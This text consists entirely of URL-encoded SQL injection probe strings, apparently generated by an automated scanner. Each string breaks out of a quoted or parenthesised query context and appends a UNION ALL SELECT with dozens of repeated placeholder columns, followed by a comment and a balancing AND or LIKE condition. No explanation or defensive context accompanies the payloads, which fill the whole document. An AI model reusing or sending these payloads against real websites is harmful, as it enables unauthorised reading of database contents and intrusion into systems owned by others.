-7147%27%29%29%20UNION%20ALL%20SELECT%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%2C%209697%23%20AND%20%28%28%27NwXG%27%3D%27NwXG -6805%27%29%29%20UNION%20ALL%20SELECT%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%23%20AND%20%28%28%27RLoh%27%3D%27RLoh -9200%27%29%29%20UNION%20ALL%20SELECT%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%23%20AND%20%28%28%27fRUy%27%3D%27fRUy -6661%27%29%29%20UNION%20ALL%20SELECT%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%2C%202157%23%20AND%20%28%28%27ANQo%27%3D%27ANQo -9717%27%29%29%20UNION%20ALL%20SELECT%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%2C%209330%23%20AND%20%28%28%27lauQ%27%3D%27lauQ -1621%27%29%29%29%20UNION%20ALL%20SELECT%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%23%20AND%20%28%28%28%27JsyG%27%3D%27JsyG -1026%27%29%29%29%20UNION%20ALL%20SELECT%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%2C%206678%23%20AND%20%28%28%28%27BRxB%27%3D%27BRxB -2355%27%29%29%29%20UNION%20ALL%20SELECT%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%23%20AND%20%28%28%28%27JzxK%27%3D%27JzxK -9849%27%29%29%29%20UNION%20ALL%20SELECT%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%23%20AND%20%28%28%28%27DkzL%27%3D%27DkzL -6383%27%29%29%29%20UNION%20ALL%20SELECT%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%2C%209112%23%20AND%20%28%28%28%27YLgz%27%3D%27YLgz -9275%27%29%29%29%20UNION%20ALL%20SELECT%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%2C%201792%23%20AND%20%28%28%28%27vOvs%27%3D%27vOvs -2161%27%29%29%29%20UNION%20ALL%20SELECT%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%2C%206665%23%20AND%20%28%28%28%27OLML%27%3D%27OLML -4044%27%29%29%29%20UNION%20ALL%20SELECT%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%23%20AND%20%28%28%28%27xJbO%27%3D%27xJbO -4643%27%29%29%29%20UNION%20ALL%20SELECT%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%23%20AND%20%28%28%28%27jCQw%27%3D%27jCQw -1346%27%29%29%29%20UNION%20ALL%20SELECT%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%2C%207517%23%20AND%20%28%28%28%27tezf%27%3D%27tezf -7926%27%20UNION%20ALL%20SELECT%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%23%20AND%20%27bgPk%27%3D%27bgPk -2018%27%20UNION%20ALL%20SELECT%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%23%20AND%20%27hWPw%27%3D%27hWPw -2468%27%20UNION%20ALL%20SELECT%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%23%20AND%20%27adHZ%27%3D%27adHZ -5589%27%20UNION%20ALL%20SELECT%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%2C%206699%23%20AND%20%27aGLs%27%3D%27aGLs -5103%27%20UNION%20ALL%20SELECT%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%23%20AND%20%27AqqM%27%3D%27AqqM -9318%27%20UNION%20ALL%20SELECT%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%23%20AND%20%27CbVx%27%3D%27CbVx -1876%27%20UNION%20ALL%20SELECT%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%2C%207220%23%20AND%20%27etaJ%27%3D%27etaJ -4008%27%20UNION%20ALL%20SELECT%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%2C%201520%23%20AND%20%27tniM%27%3D%27tniM -6912%27%20UNION%20ALL%20SELECT%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%2C%205651%23%20AND%20%27UjIQ%27%3D%27UjIQ -5524%27%20UNION%20ALL%20SELECT%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%23%20AND%20%27RlRq%27%3D%27RlRq -1124%27%29%20UNION%20ALL%20SELECT%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%2C%203962%23%20AND%20%28%27XiBL%27%20LIKE%20%27XiBL -3854%27%29%20UNION%20ALL%20SELECT%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%23%20AND%20%28%27SWOb%27%20LIKE%20%27SWOb -6314%27%29%20UNION%20ALL%20SELECT%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%23%20AND%20%28%27MJIQ%27%20LIKE%20%27MJIQ -2188%27%29%20UNION%20ALL%20SELECT%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%2C%207032%23%20AND%20%28%27bOHz%27%20LIKE%20%27bOHz -3902%27%29%20UNION%20ALL%20SELECT%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%2C%203633%23%20AND%20%28%27YBhe%27%20LIKE%20%27YBhe -7161%27%29%20UNION%20ALL%20SELECT%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%23%20AND%20%28%27nsQN%27%20LIKE%20%27nsQN -6743%27%29%20UNION%20ALL%20SELECT%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%2C%205935%23%20AND%20%28%27tMSq%27%20LIKE%20%27tMSq -8220%27%29%20UNION%20ALL%20SELECT%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%2C%202890%23%20AND%20%28%27tuGE%27%20LIKE%20%27tuGE -9670%27%29%20UNION%20ALL%20SELECT%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%2C%202884%23%20AND%20%28%27BKHw%27%20LIKE%20%27BKHw -9937%27%29%20UNION%20ALL%20SELECT%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%2C%206767%23%20AND%20%28%27Dasq%27%20LIKE%20%27Dasq -1554%27%29%29%20UNION%20ALL%20SELECT%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%23%20AND%20%28%28%27cdCS%27%20LIKE%20%27cdCS -6603%27%29%29%20UNION%20ALL%20SELECT%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%2C%209024%23%20AND%20%28%28%27oZLk%27%20LIKE%20%27oZLk -1318%27%29%29%20UNION%20ALL%20SELECT%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%2C%203728%23%20AND%20%28%28%27mRdw%27%20LIKE%20%27mRdw -8243%27%29%29%20UNION%20ALL%20SELECT%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%2C%204230%23%20AND%20%28%28%27QbBo%27%20LIKE%20%27QbBo -1027%27%29%29%20UNION%20ALL%20SELECT%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%23%20AND%20%28%28%27pnUe%27%20LIKE%20%27pnUe -8030%27%29%29%20UNION%20ALL%20SELECT%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%23%20AND%20%28%28%27ifts%27%20LIKE%20%27ifts -4054%27%29%29%20UNION%20ALL%20SELECT%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%2C%207652%23%20AND%20%28%28%27mYxf%27%20LIKE%20%27mYxf -9961%27%29%29%20UNION%20ALL%20SELECT%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%2C%205283%23%20AND%20%28%28%27fbPv%27%20LIKE%20%27fbPv -2053%27%29%29%20UNION%20ALL%20SELECT%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%2C%204162%23%20AND%20%28%28%27vZXh%27%20LIKE%20%27vZXh -9517%27%29%29%20UNION%20ALL%20SELECT%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%23%20AND%20%28%28%27Jxni%27%20LIKE%20%27Jxni -5753%27%29%29%29%20UNION%20ALL%20SELECT%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%23%20AND%20%28%28%28%27rtQX%27%20LIKE%20%27rtQX 